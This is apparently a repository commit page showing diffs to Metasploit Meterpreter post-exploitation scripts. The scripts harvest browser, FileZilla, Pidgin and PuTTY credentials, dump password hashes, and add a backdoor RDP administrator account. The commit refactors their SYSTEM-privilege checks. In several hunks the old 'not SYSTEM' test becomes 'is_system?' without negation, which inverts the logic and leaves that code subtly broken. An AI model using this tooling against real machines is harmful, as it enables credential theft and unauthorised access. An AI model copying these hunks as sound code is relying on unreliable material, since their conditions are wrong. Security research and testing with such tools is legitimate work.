Browse Source

Update Meterpreter scripts to use is_system? and make getgui script language independent thru the use of SID for group identification

git-svn-id: file:///home/svn/framework3/trunk@11998 4d416f70-5f16-0410-b530-b9f4589650
Carlos Perez 8 years ago
parent
commit
89795f1784

+ 4
- 1
scripts/meterpreter/enum_chrome.rb View File

@@ -208,7 +208,10 @@ elsif os =~ /(2000|NET|XP)/
208 208
 end
209 209
 
210 210
 usernames = []
211
-if (uid = client.sys.config.getuid) == "NT AUTHORITY\\SYSTEM"
211
+
212
+uid = client.sys.config.getuid
213
+
214
+if is_system?
212 215
 	print_status "running as SYSTEM, extracting user list..."
213 216
 	print_status "(decryption of passwords and credit card numbers will not be possible)"
214 217
 	client.fs.dir.foreach(@profiles_path) do |u|

+ 1
- 1
scripts/meterpreter/enum_firefox.rb View File

@@ -252,7 +252,7 @@ end
252 252
 if client.platform =~ /win32|win64/
253 253
 	if frfxchk
254 254
 		user = @client.sys.config.getuid
255
-		if user != "NT AUTHORITY\\SYSTEM"
255
+		if is_system?
256 256
 			usrname = Rex::FileUtils.clean_path(@client.fs.file.expand_path("%USERNAME%"))
257 257
 			db_path = @client.fs.file.expand_path("%APPDATA%") + "\\Mozilla\\Firefox\\Profiles"
258 258
 			if kill_frfx

+ 1
- 1
scripts/meterpreter/enum_powershell_env.rb View File

@@ -33,7 +33,7 @@ def enum_users
33 33
 		profilepath = "\\My Documents\\WindowsPowerShell\\"
34 34
 	end
35 35
 
36
-	if user == "NT AUTHORITY\\SYSTEM"
36
+	if is_system?
37 37
 		print_status("Running as SYSTEM extracting user list..")
38 38
 		@client.fs.dir.foreach(path4users) do |u|
39 39
 			userinfo = {}

+ 2
- 2
scripts/meterpreter/enum_putty.rb View File

@@ -21,8 +21,8 @@ opts.parse(args) { |opt, idx, val|
21 21
 
22 22
 def hkcu_base
23 23
 	key_base = []
24
-	user = @client.sys.config.getuid
25
-	if user != "NT AUTHORITY\\SYSTEM"
24
+	
25
+	if is_system?
26 26
 		key_base << "HKCU"
27 27
 	else
28 28
 		key = "HKU\\"

+ 2
- 2
scripts/meterpreter/enum_shares.rb View File

@@ -76,8 +76,8 @@ if client.platform =~ /win32|64/
76 76
 
77 77
 	# Enumerate shares being offered
78 78
 	enum_conf_shares()
79
-	user = client.sys.config.getuid
80
-	if user != "NT AUTHORITY\\SYSTEM"
79
+	
80
+	if is_system?
81 81
 		mount_history = enum_recent_mounts("HKEY_CURRENT_USER")
82 82
 		run_history = enum_run_unc("HKEY_CURRENT_USER")
83 83
 	else

+ 2
- 2
scripts/meterpreter/enum_vmware.rb View File

@@ -101,8 +101,8 @@ def enum_viclient
101 101
 			end
102 102
 		end
103 103
 	end
104
-	user = @client.sys.config.getuid
105
-	if user != "NT AUTHORITY\\SYSTEM"
104
+	
105
+	if is_system?
106 106
 		recentconns = registry_getvaldata("HKCU\\Software\\VMware\\VMware Infrastructure Client\\Preferences","RecentConnections").split(",")
107 107
 		print_status("Recent VI Client Connections:")
108 108
 		recentconns.each do |c|

+ 2
- 2
scripts/meterpreter/get_filezilla_creds.rb View File

@@ -115,7 +115,7 @@ end
115 115
 #Function to enumerate the users if running as SYSTEM
116 116
 def enum_users(os)
117 117
 	users = []
118
-	user = @client.sys.config.getuid
118
+	
119 119
 	path4users = ""
120 120
 	sysdrv = @client.fs.file.expand_path("%SystemDrive%")
121 121
 
@@ -127,7 +127,7 @@ def enum_users(os)
127 127
 		path2purple = "\\Application Data\\"
128 128
 	end
129 129
 
130
-	if user == "NT AUTHORITY\\SYSTEM"
130
+	if is_system?
131 131
 		print_status("Running as SYSTEM extracting user list..")
132 132
 		@client.fs.dir.foreach(path4users) do |u|
133 133
 			userinfo = {}

+ 2
- 2
scripts/meterpreter/get_pidgin_creds.rb View File

@@ -145,7 +145,7 @@ end
145 145
 #Function to enumerate the users if running as SYSTEM
146 146
 def enum_users(os)
147 147
 	users = []
148
-	user = @client.sys.config.getuid
148
+	
149 149
 	path4users = ""
150 150
 	sysdrv = @client.fs.file.expand_path("%SystemDrive%")
151 151
 
@@ -157,7 +157,7 @@ def enum_users(os)
157 157
 		path2purple = "\\Application Data\\"
158 158
 	end
159 159
 
160
-	if user == "NT AUTHORITY\\SYSTEM"
160
+	if is_system?
161 161
 		print_status("Running as SYSTEM extracting user list..")
162 162
 		@client.fs.dir.foreach(path4users) do |u|
163 163
 			userinfo = {}

+ 7
- 42
scripts/meterpreter/getgui.rb View File

@@ -21,7 +21,6 @@ logs = ::File.join(Msf::Config.log_directory,'scripts', 'getgui')
21 21
 @@exec_opts = Rex::Parser::Arguments.new(
22 22
 	"-h" => [ false, "Help menu." ],
23 23
 	"-e" => [ false, "Enable RDP only." ],
24
-	"-l" => [ true, "The language switch\n\t\tPossible Options: 'de_DE', 'en_EN' / default is: 'en_EN'" ],
25 24
 	"-p" => [ true,  "The Password of the user to add." ],
26 25
 	"-u" => [ true,  "The Username of the user to add." ],
27 26
 	"-f" => [ true,  "Forward RDP Connection." ]
@@ -35,23 +34,6 @@ def usage
35 34
 end
36 35
 
37 36
 
38
-def langdetect(lang)
39
-	if lang != nil
40
-		print_status("Language set by user to: '#{lang}'")
41
-	else
42
-		print_status("Language detection started")
43
-		lang = client.sys.config.sysinfo['System Language']
44
-		if lang != nil
45
-			print_status("\tLanguage detected: #{lang}")
46
-		else
47
-			print_error("\tLanguage detection failed, falling back to default 'en_EN'")
48
-			lang = "en_EN"
49
-		end
50
-	end
51
-	return lang
52
-rescue::Exception => e
53
-	print_status("The following Error was encountered: #{e.class} #{e}")
54
-end
55 37
 
56 38
 
57 39
 def enablerd()
@@ -100,26 +82,11 @@ end
100 82
 
101 83
 
102 84
 
103
-def addrdpusr(session, username, password, lang)
104
-	# Changing the group names depending on the selected language
105
-	case lang
106
-	when "en_EN"
107
-		rdu = "Remote Desktop Users"
108
-		admin = "Administrators"
109
-	when "en_US"
110
-		rdu = "Remote Desktop Users"
111
-		admin = "Administrators"
112
-	when "de_DE"
113
-		rdu = "Remotedesktopbenutzer"
114
-		admin = "Administratoren"
115
-	when "fr_FR"
116
-		rdu = "Utilisateurs du Bureau � distance"
117
-		admin = "Administrateurs"
118
-	else
119
-		print_error("Could not determine lenguage, defaulting to English!")
120
-		rdu = "Remote Desktop Users"
121
-		admin = "Administrators"
122
-	end
85
+def addrdpusr(session, username, password)
86
+		
87
+	rdu = resolve_sid("S-1-5-32-555")[:name]
88
+	admin = resolve_sid("S-1-5-32-544")[:name]
89
+
123 90
 
124 91
 	print_status "Setting user account for logon"
125 92
 	print_status "\tAdding User: #{username} with Password: #{password}"
@@ -159,8 +126,6 @@ frwrd = nil
159 126
 		pass = val
160 127
 	when "-h"
161 128
 		usage
162
-	when "-l"
163
-		lang = val
164 129
 	when "-f"
165 130
 		frwrd = true
166 131
 		lport = val
@@ -178,8 +143,8 @@ if client.platform =~ /win32|win64/
178 143
 				enabletssrv()
179 144
 			end
180 145
 			if usr and pass
181
-				lang = langdetect(lang)
182
-				addrdpusr(session, usr, pass, lang)
146
+				
147
+				addrdpusr(session, usr, pass)
183 148
 			end
184 149
 			if frwrd == true
185 150
 				print_status("Starting the port forwarding at local port #{lport}")

+ 1
- 1
scripts/meterpreter/remotewinenum.rb View File

@@ -171,7 +171,7 @@ if client.platform =~ /win32|win64/
171 171
 
172 172
 			# Making sure that is running as System a Username and Password for target machine must be provided
173 173
 
174
-			if session.sys.config.getuid == "NT AUTHORITY\\SYSTEM" && rusr == nil && rpass == nil
174
+			if is_system? && rusr == nil && rpass == nil
175 175
 
176 176
 				print_status("Stopped: Running as System and no user provided for connecting to target!!")
177 177
 

+ 2
- 2
scripts/meterpreter/winenum.rb View File

@@ -606,7 +606,7 @@ elsif trgtos =~ /(Windows 2008)/
606 606
 	list_exec(commands + win2k8cmd)
607 607
 	wmicexec(wmic)
608 608
 	findprogs()
609
-	if (client.sys.config.getuid != "NT AUTHORITY\\SYSTEM")
609
+	if not is_system?
610 610
 		print_line("[-] Not currently running as SYSTEM, not able to dump hashes in Windows 2008 if not System.")
611 611
 	else
612 612
 		gethash()
@@ -621,7 +621,7 @@ elsif trgtos =~ /Windows (Vista|7)/
621 621
 	end
622 622
 	wmicexec(wmic)
623 623
 	findprogs()
624
-	if (client.sys.config.getuid != "NT AUTHORITY\\SYSTEM")
624
+	if not is_system?
625 625
 		print_line("[-] Not currently running as SYSTEM, not able to dump hashes in Windows Vista or Windows 7 if not System.")
626 626
 	else
627 627
 		gethash()

Loading…
Cancel
Save